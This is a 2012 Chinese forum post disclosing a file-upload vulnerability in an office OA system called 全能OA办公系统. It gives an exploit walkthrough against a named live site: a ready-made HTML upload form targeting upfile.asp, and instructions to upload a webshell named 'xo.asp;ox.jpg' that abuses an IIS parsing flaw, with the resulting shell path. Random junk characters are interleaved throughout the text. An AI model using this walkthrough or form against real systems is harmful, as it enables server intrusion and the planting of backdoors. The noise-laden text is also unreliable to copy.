全能OA办公系统 上传漏洞
4 \7 P: r5 y7 O; G5 h( F6 C+ M" z% N! ]9 ?% E8 U
系统介绍:- ^" x; f# w' Y4 U8 y6 `
& Y- j2 l2 t* z8 y全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。. ^3 I4 o$ `6 }& @
# e; a6 X. c/ y% o! R3 `主要功能: s& E: q. ?1 j/ e- k$ d
公司通告
4 m0 j* [! x0 x8 @4 f/ G* b工作计划 % `: \0 H% v3 A) G, I
通讯助理 6 Q6 E- G0 n. S+ L5 B
客户资源
% w7 K0 T9 I$ E i1 q- S我的公文 ' H$ G: n6 r$ E) y8 C0 [
公文传阅 6 B7 x3 m0 h% p# t
公共资源 $ Y, Q9 u* l+ B6 O
资源预约 + Y) b. F& h- _! P6 C+ b
今日考勤 3 i( I! ]* @+ W
个人计划
9 h. I, A. ?/ p; ?个人通讯录
& N$ i3 J1 U% L0 ?8 u* I9 X. t' Q个人基本档案
9 Z3 \2 s9 `" k. O未读邮件 & c$ @. f8 L' Q7 g. Q& b
发邮件
* }0 F4 q0 I+ x/ }8 J! D, `+ o收件夹
& J! U, Y4 U! z, N7 b寄件夹
' y4 f1 j' B! |% ^/ n* P网络硬盘 / F5 F" |" m2 a/ ^. a( Q
网络会议
9 f/ O8 r$ K- O网络调查 $ Y4 g8 ]# R: H2 e
交流论坛* r5 [) n. c) A5 ]
A! o5 f4 c% _# [, w有兴趣测试的朋友可以下源码看看
9 o! w- k4 c$ G/ Q1 ]# C* \* T$ z2 r3 u5 V/ W5 @0 |! d/ j
源码下载:
r! E( D# ?* P
' A0 c, s2 [ T1 a: A3 S4 c' chttp://www.mycodes.net/30/4750.htm
, Y$ `9 f1 _: u9 c& }. [8 }; t, d, r2 _0 h; K
漏洞介绍:
) E# I) [0 R' m& i2 q9 u
H8 P5 o1 u4 K' F, \/ I由upfile.asp上传文件漏洞引起, C/ t, \ H$ v* s A% L
6 |0 d3 w) M+ U* Q' l' f" g# k$ D
测试方法:3 _3 J2 b3 V% `) T" R6 F( t' P. W
/ Y+ Y- N$ i/ k6 X; D
使用名小子上传http://www.itlynn.com/upfile.asp即可/ e5 j/ ] l" l( e* j; ~" B
; x6 E, t$ w' d如果upfile.asp文件被删除不存在。
9 n8 [0 e5 D4 q% X+ r
6 q7 {9 s; D7 C% ~ 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
, m( Y3 P9 r/ T, e) j9 E4 Q3 Y/ V( N$ ?) P' c, I4 X
如果存在那么将如下代码保存为upfile.html。
+ r w9 |8 c$ D2 I( U! ?" J; \: o% J4 v6 k
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。7 L* K0 H- u/ C& Y* V
; s! S! p3 Y$ L, L7 X 7 Z' _# i1 p, C: @2 i! T% p
$ U3 o4 Y ?2 A" p% E( K/ a01 <table border='0' align="center" cellpadding="5">
- J8 n: a& p8 q5 ^# M5 n1 d
3 @0 Y4 t& H% Q9 ^5 O/ I) Y02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
k% v/ A/ t( {3 d0 m0 S+ l- f8 o& n6 J1 l/ [- y3 V( r5 e
03 <tr>
: v" w; }' i( }( Q1 |. p( f/ _% i% R1 }2 K& T
04 <td>报错:</td> ' |% s& ~" _) B, R3 ^2 D0 |
: }9 K# ]8 N: N Z, a$ C# M05 <td><input type='radio' name='errnumber' value='0'> ; W4 q, F3 L I# {4 r
) l5 }/ e8 Y$ e( D* N06 自动更名
8 T; V0 a4 P' V
2 B0 f, Q( t2 {07 <input type='radio' name='errnumber' value='1' checked>
~, C8 I Y( Z
6 v& P% H6 O' @08 报错方式 * x2 q5 C7 c4 x6 }' `
6 D2 T0 K+ J, X% I6 n+ p
09 <input type='radio' name='errnumber' value='2'>
5 R; [ u4 y; a: }$ m. j0 F4 N8 b3 ]. d( `5 d( g9 v) i' {
10 直接覆盖</td>
3 W$ Z) {+ F$ E2 p9 ]/ c- a4 t
& e: t n+ @8 p$ M! { Z2 p5 M11 </tr> / |0 v3 `6 n! X+ e9 _# o* o
+ ], S9 P' N" |4 I3 k/ _$ t
12 <tr> # ^! y% l2 J6 q7 }. j- @1 }& ?
! I& K* R) m! M# `$ c+ l) v" T
13 <td>主题:</td> ( [9 M8 m1 @9 s% l" a8 z% \
. _% M$ [: q8 H: z: {
14 <td><input type='text' name='filename' size='30'></td>
6 G$ E! s& i, Q; i7 T% A3 w& Q% K2 _6 z6 o
15 </tr>
& x; u4 r/ r6 w7 Z$ L- ^: i# m
& o) U5 J- ?9 q1 c& d1 K16 <tr>
, S3 D) Z* A- j& L; b9 ~% A
$ P; w* a9 ^- f$ i& |- a17 <td>文件:</td>
1 K* W' F: m9 T% `6 o( R1 s$ k$ W' U
18 <td><input type="file"name="fruit"size="30"></td> 6 c4 E2 N' C% J3 ~6 M
, v' _ o5 i8 W
19 </tr>
4 `. G- [, Z8 a0 e7 e! R( H
0 Q" t! [- }# q' }& B: H# Z& U20 <tr> ' i' W$ u) Y ?3 h# S
' h4 Y: d7 j" g2 H21 <td valign='top'>简介:</td>
+ L. Q* e& t( k! O9 a5 m' x- ?
1 Z4 s# n t: |! n2 W22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> & G' a% t6 o" \- E. j
z- S$ Y) l7 c/ S1 ], F23 </tr>
* U4 J6 \9 I$ h0 f; w' I" r
$ i, @; ~* w1 I2 d( l9 u. n24
* Y& x6 B" Y/ }: A6 A& z
' U$ e m- S+ ~25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
: l- \+ {1 @& c% Y
6 G* ?2 e, g+ U$ L$ ~26 </tr> $ ^# G1 Q ]5 J7 ?) n. _
8 d/ D6 @; y% w% Z, `27 </form> 2 v% d5 O. Y* I8 f! k* n3 Y
- ^: Q; F9 K& w% I' ]然后打开上传一个文件名为xo.asp;ox.jpg的文件。
/ F) r2 K8 |5 @" `' b: U
- l6 A6 H7 t$ \) k) C, _+ w3 T
R0 `9 x& c! L& W$ H! V
9 T% o6 e* v6 ~" t上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg' B/ ^. e: S3 S. U# f5 i0 _& X9 a, `
5 S3 q! Y E: w2 a' t& c$ `# L此漏洞需要配合解析漏洞利用。8 f/ t: O/ f0 l
& U: v6 ~+ F: l, S
|
发表于 2012-11-21 13:45:12
收藏
支持
反对